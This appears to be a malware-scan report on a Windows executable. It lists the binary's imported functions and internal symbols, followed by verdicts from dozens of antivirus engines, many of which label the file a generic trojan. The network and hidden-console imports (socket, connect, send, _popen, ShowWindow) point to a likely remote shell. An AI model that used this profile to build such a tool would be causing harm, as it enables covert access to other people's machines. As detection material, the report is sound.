.eh_frame$_ZNSt11char_traitsIcE7compareEPKcS2_j
.eh_frame$feof
.eh_frame$_ZSteqIcEN9__gnu_cxx11__enable_ifIXsrSt9__is_charIT_E7__valueEbE6__typeERKNSt7__cxx1112basic_stringIS3_St11char_traitsIS3_ESaIS3_EEESE_
__setargv
___cpu_features_init
.text.startup
___do_global_dtors
___do_global_ctors
___dyn_tls_init@12
___tlregdtor
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
___mingw_TLScallback
__pei386_runtime_relocator
.debug_info
.debug_abbrev
.debug_line
.debug_aranges
.debug_frame
_fesetenv
___mingw_glob
___mingw_globfree
___mingw_dirname
___mingw_opendir
___mingw_readdir
___mingw_closedir
___mingw_rewinddir
___mingw_telldir
___mingw_seekdir
___mingw_sleep
___FRAME_END__
___JCR_END__
_register_frame_ctor
.ctors.65535
.rdata_runtime_pseudo_reloc
__imp__FindFirstFileA@8
__imp__strtok
__fu4___ZSt4cerr
_ShowWindow@8
_VirtualProtect@16
___RUNTIME_PSEUDO_RELOC_LIST__
__imp___fullpath
_FindFirstFileA@8
__imp___setmode
__data_start__
_FreeLibrary@4
___DTOR_LIST__
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEPKc
__imp__VirtualProtect@16
__imp__recv@16
__imp___Unwind_Resume
__imp___onexit
___p__fmode
__imp__GetLastError@0
_SetUnhandledExceptionFilter@4
__imp__VirtualQuery@12
__fu3___ZSt4cout
__imp____register_frame_info
__nm___ZSt4cout
__imp__FindNextFileA@8
___tls_start__
__imp__TlsGetValue@4
__libmsvcrt_a_iname
__imp__InitializeCriticalSection@4
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEPKc
_DeleteCriticalSection@4
__rt_psrelocs_start
__imp__abort
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
__dll_characteristics__
__imp__chdir
__size_of_stack_commit__
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
__size_of_stack_reserve__
__major_subsystem_version__
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
__imp__stricoll
__imp____mb_cur_max
__imp__AllocConsole@0
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv
_GetLastError@0
__imp____p__environ
__imp___pctype
_VirtualQuery@12
__head_libuser32_a
_mingw_initltsdrot_force
__imp___ZSt4cerr
__imp___iob
__ZNSt8ios_base4InitC1Ev
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4findEPKcj
_GetModuleHandleA@4
__imp__strncmp
___register_frame_info
__libmoldname_a_iname
_hmod_libgcc
.weak.___register_frame_info.___EH_FRAME_BEGIN__
__imp____deregister_frame_info
__imp__strdup
__imp___isctype
__bss_start__
___RUNTIME_PSEUDO_RELOC_LIST_END__
__fpreset
__size_of_heap_commit__
_libgcc_s_dw2_1_dll_iname
__imp___errno
__fu0___ZSt4cout
___p__environ
__imp__GetProcAddress@8
_GetProcAddress@8
___crt_xp_start__
__imp__wcstombs
__nm___ZSt4cerr
__fu2___ZSt4cout
_GetCommandLineA@0
__ZNSaIcEC1Ev
__imp___ZNSt8ios_base4InitD1Ev
___crt_xp_end__
__imp__signal
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
__imp__puts
__minor_os_version__
__imp__atexit
___udivdi3
__imp__mbstowcs
__imp___ZSt4cout
__head_libmsvcrt_a
__image_base__
__isctype
__imp__exit
__section_alignment__
_socket@12
_LoadLibraryA@4
_wcstombs
__imp__FreeLibrary@4
__imp__GetStartupInfoA@4
__IAT_end__
__head_libmoldname_a
__RUNTIME_PSEUDO_RELOC_LIST__
__imp__htons@4
_setlocale
__imp____p__fmode
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv
__tls_start
_ExitProcess@4
__imp__strcoll
__data_end__
___getmainargs
_FindClose@4
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
__CTOR_LIST__
_mbstowcs
__imp___popen
___set_app_type
__imp___ZNSaIcEC1Ev
__bss_end__
__CRT_fmode
__head_libwsock32_a
__imp___ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
___crt_xc_end__
__tls_index
__imp___ZNSt8ios_base4InitC1Ev
__ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
___crt_xc_start__
__imp__fgets
__imp__socket@12
__head_libstdc___6_dll
__imp__closesocket@4
___CTOR_LIST__
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4findEPKcj
_FindWindowA@8
_AllocConsole@0
__imp___pclose
__rt_psrelocs_size
_GetStartupInfoA@4
__imp__FindWindowA@8
_WSAStartup@8
__ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
__imp____udivdi3
__imp___ZNSolsEPFRSoS_E
__imp__memcpy
_FindNextFileA@8
__imp__strcmp
__imp__inet_addr@4
__file_alignment__
__imp__LeaveCriticalSection@4
__imp__malloc
__head_libgcc_s_dw2_1_dll
__imp__strncpy
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_
___EH_FRAME_BEGIN__
__imp__memcmp
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
__major_os_version__
__imp__realloc
__IAT_start__
_stricoll
__tls_end
__imp__GetModuleHandleA@4
__DTOR_LIST__
__imp___fpreset
.weak.___deregister_frame_info.___EH_FRAME_BEGIN__
_EnterCriticalSection@4
__imp__memset
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
__fullpath
__ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
__size_of_heap_reserve__
___crt_xt_start__
___ImageBase
__subsystem__
__imp__strlen
.weak.__Jv_RegisterClasses.___EH_FRAME_BEGIN__
__CRT_fenv
__imp__strcpy
__imp__calloc
__fu1___ZSt4cout
__Jv_RegisterClasses
__imp____getmainargs
___tls_end__
__imp__ExitProcess@4
_mingw_initltssuo_force
__imp__WSACleanup@0
__imp__send@16
_InitializeCriticalSection@4
___cpu_features
__imp__free
__imp___ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_
__imp__SetUnhandledExceptionFilter@4
___deregister_frame_info
__imp___ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
__major_image_version__
__loader_flags__
__libuser32_a_iname
__imp__ShowWindow@8
__imp__tolower
__CRT_glob
___gxx_personality_v0
__setmode
_libstdc___6_dll_iname
__imp__printf
___chkstk_ms
_inet_addr@4
__head_libkernel32_a
__rt_psrelocs_end
__imp___cexit
__minor_subsystem_version__
__imp__FindClose@4
__minor_image_version__
__imp__Sleep@4
__imp__vfprintf
__imp___ZNSaIcED1Ev
_closesocket@4
__imp____set_app_type
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_
_mingw_initltsdyn_force
__Unwind_Resume
__ZNSaIcED1Ev
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_
_TlsGetValue@4
__imp__DeleteCriticalSection@4
_LeaveCriticalSection@4
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
__imp__WSAStartup@8
__imp__GetCommandLineA@0
__imp__LoadLibraryA@4
__ZNSolsEPFRSoS_E
__imp___ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_WSACleanup@0
__imp__setlocale
__RUNTIME_PSEUDO_RELOC_LIST_END__
__libkernel32_a_iname
___dyn_tls_init_callback
_connect@12
__libwsock32_a_iname
__imp__connect@12
__tls_used
__ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_
__ZNSt8ios_base4InitD1Ev
___crt_xt_end__
_vfprintf
__imp__strcat
__imp__EnterCriticalSection@4
__imp__fwrite
__imp____gxx_personality_v0
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.GenericFCA.4!c
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.GenericFCA.Agent.119790
Cylance Unsafe
Sangfor Trojan.Win32.Agent.Vp2d
K7AntiVirus Trojan ( 00502cba1 )
Alibaba Trojan:Win32/MalwareX.5eb7b328
K7GW Trojan ( 00502cba1 )
Cybereason malicious.6ec35c
huorong Clean
Baidu Clean
VirIT Trojan.Win32.Genus.WGL
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Agent.VNV
APEX Clean
McAfee Clean
Avast Win32:MalwareX-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky Trojan.Win32.Agent.gen
BitDefender Trojan.GenericFCA.Agent.119790
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericFCA.Agent.119790
Tencent Win32.Trojan.Agent.Rnkl
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/AVI.Agent.rxfqc
DrWeb Clean
VIPRE Trojan.GenericFCA.Agent.119790
TrendMicro Clean
McAfeeD ti!9CC2E2D5FEEB
Trapmine Clean
FireEye Trojan.GenericFCA.Agent.119790
Emsisoft Trojan.GenericFCA.Agent.119790 (B)
Ikarus Trojan.Win32.Injector
GData Trojan.GenericFCA.Agent.119790
Jiangmin Clean
Webroot Clean
Varist W32/ABTrojan.WPND-4484
Avira TR/AVI.Agent.rxfqc
Antiy-AVL Trojan/Win32.Agent
Kingsoft Win32.Trojan.Agent.gen
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.GenericFCA.Agent.D1D3EE
SUPERAntiSpyware Clean
ZoneAlarm Trojan.Win32.Agent.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5658453
Acronis Clean
BitDefenderTheta Gen:NN.ZexaF.36810.e0Y@amuQCij
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Trojan.Script.PWRS
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09DQ24
Rising Trojan.Agent!8.B1E (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.243317448.susgen
Fortinet W32/Agent.VNV!tr
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike Clean
alibabacloud Trojan:Win/Agent.VTN
No IRMA results available.